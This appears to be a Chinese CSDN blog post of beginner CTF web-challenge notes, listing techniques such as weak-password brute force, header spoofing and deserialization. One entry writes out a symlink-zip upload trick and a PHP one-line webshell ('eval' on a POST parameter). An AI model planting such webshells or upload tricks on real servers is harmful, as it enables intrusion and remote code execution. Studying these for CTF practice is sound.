web新手题目大全

最新推荐文章于 2024-03-12 11:10:24 发布
最新推荐文章于 2024-03-12 11:10:24 发布
阅读量218 收藏 1
点赞数
分类专栏: CTF学习笔记 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NYG694/article/details/131763856
版权
文章探讨了多种Web安全攻击手段,包括利用弱口令进行爆破,通过一句话木马植入,利用软链接在特定目录执行文件,PHP文件的压缩与反序列化漏洞,以及如何通过数组特性、正则表达式绕过过滤等方法进行攻击。同时提到了实际安全演练(如赣网杯)和防御策略。
摘要由CSDN通过智能技术生成

1.弱口令爆破

2.一句话木马

不在var/www/html目录下解压所以不会产生解压执行文件的安全隐患,要使用软连接到根目录

 构造软连接

ln -s var/www/html test

压缩文件

zip --symlinks test1.zip test

--symlinks表示压缩软连接 

这时解压文件后是软连接就会实现从tmp指向var/www/html

接下来就是在var/www/html目录下上传一个shell文件就可以了

在test的目录下创建一句话php文件

shell文件内容:        <?php @eval($_POST['cmd']);?> 

然后再对test进行压缩                zip -r test1.zip test

3指定参数访问(本地127.0.0.1  X-forwarded-for) 

4 cookie暗示

5双写绕过(重组)

第一个上传,第二个读取。

6.vim读取,利用vim特性读取wep文件。

7.php反序列化

 8.数组特性

 9.实战演练(赣网杯)

10.如果正则表达式过滤过多,考虑使用js组成新的传参函数。 

11.八进制传参,传参前要有符号标识

 

N1_WEB
关注
专栏目录
34C3 CTF Web题 extract0r Writeup (软链接实现任意读文件/目录+SSRF绕过内网ip黑名单+Gopher攻击MySQL+zip文件构造)
keyball123的博客
03-28 1万+
extract0r – A web challenge from hxp 34C3 CTF https://ctftime.org/event/544 题目部署 本地搭建: https://github.com/shimmeris/CTF-Web-Challenges/tree/master/SSRF/34c3-2017-extract0r 在34c3-2017-extract0r目录下执...
攻防世界web新手题答案_攻防世界web 新手区 wp
weixin_39518840的博客
11-21 2982
view_source题目描述右击不管用,打开题目看到以下界面右击不管用,可以按F12 -> source 查看源代码,拿到flagrobots题目描述就是和robots协议有关的,直接在url中 输入robots.txt 查看 robots协议,并拿到flagrobots协议robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Note...
文件任意读取和强碰撞
qq_53142368的博客
08-31 2309
文章目录一、babypython[国赛总决赛复现]考点:硬链接读取任意文件、伪造session二、BUUCTF-[安洵杯 2019]easy_web总结 一、babypython[国赛总决赛复现] 考点:硬链接读取任意文件、伪造session 这个题当时打开是一个文件上传 然后上传一个文件 显示需要上传zipfile,当时用bp拦截 改zip 上传成功后 没有回显文件的路径 然后就卡住了 后来发现这个题考点是 硬链接读取任意文件 伪造session ln -si /app/y0u_found_it.i
2023ciscn初赛 Unzip
2202_75317918的博客
06-16 1123
2023ciscn初赛 Unzip
linux常用命令(1):zip/unzip命令(压缩文件/解压缩文件)
热门推荐
weixin_49114503的博客
09-18 10万+
本文主要讲解在Linux上怎么将文件压缩成zip包,及解压缩zip包。zip命令 可以用来解压缩文件,或者对文件进行打包操作。zip是个使用广泛的压缩程序,文件经它压缩后会另外产生具有“.zip”扩展名的压缩文件。通过 zip 命令可以将文件打包成.zip格式的压缩包,里面会附含文件的名称、路径、创建时间、上次修改时间等等信息,与 tar 命令相似。
linux zip 常用功能
最新发布
健康工作每一天
03-12 316
【代码】linux zip 常用功能。
CTF-WEB(攻防世界题目-新手区)
皮卡乒的皮卡乓
09-27 3451
CTF-WEB新手区view_sourcerobotsbackup 新手区 view_source 题目:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 解:右键有用不了,那就直接用F12,查看源码 可以看到这里的注释即为Flag robots 题目:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 解: 一进来,啥也没有。根据题目,是robots协议: robots协议也叫robots.txt(统一小写)是一种存放于网站根目录
CTFShow 2022——新手杯wp WEB题目
qq_60878323的博客
10-09 1271
小艾大佬的投稿支持 web AK了
2021-06-24CTF-攻防世界-WEB新手练习区(12题入门题)
u258710的博客
06-24 2658
CTF-攻防世界-WEB新手练习区(12题入门题)01-view_source02-robots03-backup04-cookie05-disabled_button06-weak_auth07-simple_php08-get_post09-xff_referer10-webshell11-command_execution12-simple_js 01-view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目提示查看网页源代码,但鼠标右键不管用
ctf web5 练习_CTF-攻防世界-WEB新手练习区 Writeup(12题入门题)
weixin_33603656的博客
01-15 3637
注:作者是CTF初学者,边学习边记录,如有错误或疏漏请批评指正,也请各位大佬多多包涵。攻防世界-WEB新手练习区 12题入门题 Writeup(注意:攻防世界WEB题每次生成场景后,有时flag会改变,因此flag不同不要在意,主要是学习解题思路和方法)0X01view_sourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。题目提示查看源码,鼠标右键不管用,用F12...
idekctf2022部分web
v2ish1yan的博客
01-26 1224
我爱idekctf!!!!有dockerfile真是太棒了因为实在不会前端,所以暂时只复现非xss的题目题目附件我都放在了。
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3737
2022美团CTF的WEB方向Write up
2021深育杯线上初赛官方WriteUp
swordheart的博客
11-30 1289
Web EasySQL 访问robots.txt,可得三个文件index.php、config.php、helpyou2findflag.php。 fuzz黑名单,可发现select、单双引号、括号、分号、set、show、variables、等都没有过滤。 经测试可得到闭合方式为括号,且白名单为数据库记录行数,使用1);{sqlinject}-- +可以闭合查询语句并进行堆叠注入。 show variables like '%slow_query_log%'; # 查询慢日志记录是否开启...
Linux中zip和tar处理软链接的差异与选择
weixin_33915554的博客
05-16 1877
Linux中zip和tar处理软链接的差异与选择 系统环境 cat /etc/redhat-release CentOS Linux release 7.3.1611 (Core) getenforce Disabled 安装zip,unzip #直接yum安装 yum install -y zip unzip 创建实验文件 #cd到tmp目录下 cd /tmp #创建目录及文件 mkdir ...
Linux 磁盘维护 : symlinks 命令详解
yexiangCSDN的专栏
10-19 1102
Linux symlinks命令用于维护符号连接的工具程序。 symlinks可检查目录中的符号连接,并显示符号连接类型。以下为symlinks可判断的符号连接类型: absolute:符号连接使用了绝对路径。 dangling:原始文件已经不存在。 lengthy:符号连接的路径中包含了多余的"../"。 messy:符号连接的路径中包含了多余的"/"。 other_fs:原始文件位...
zip(1) command
Dablelv 的博客专栏。
11-24 1万+
zip 命令是一个应用广泛的跨平台的打包和压缩工具,使用Deflate(LZ77 + 哈夫曼编码)无损压缩算法将文件压缩为后缀为 .zipzip 文件。其配套的命令为unzip,用于解压 zip 文件。
cat 软链接
zyxyzz的博客
12-04 756
ln -s /etc/flag flag zip --symlinks flag.zip flag
[Root-me]File upload - ZIP Writeup
Vicl1fe的博客
01-01 1838
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 Root-me网址: https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-ZIP 题目描述: Your goal is to read index.php file. 知识点 zip文件上传 是一个zip文件上传,上传后悔解压zip...
文件上传漏洞原理和利用
VictorZhang
08-06 3541
文件上传 1.前段选择文件,提交文件 2.浏览器形成POST MultiPart报文发送到服务器 3.服务器中间件接收到报文,解析后交给后端代码进行处理 4.后端代码将上传的文件内容写入到临时文件中(PHP特有) 5.写入到文件中,文件名为提交的文件名或以一定规则生成的文件名 文件上传漏洞 1.未对上传文件进行严格的验证和过滤时,容易造成动态文件asp/php/jsp等等 2.如果上传的目标目录没...
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值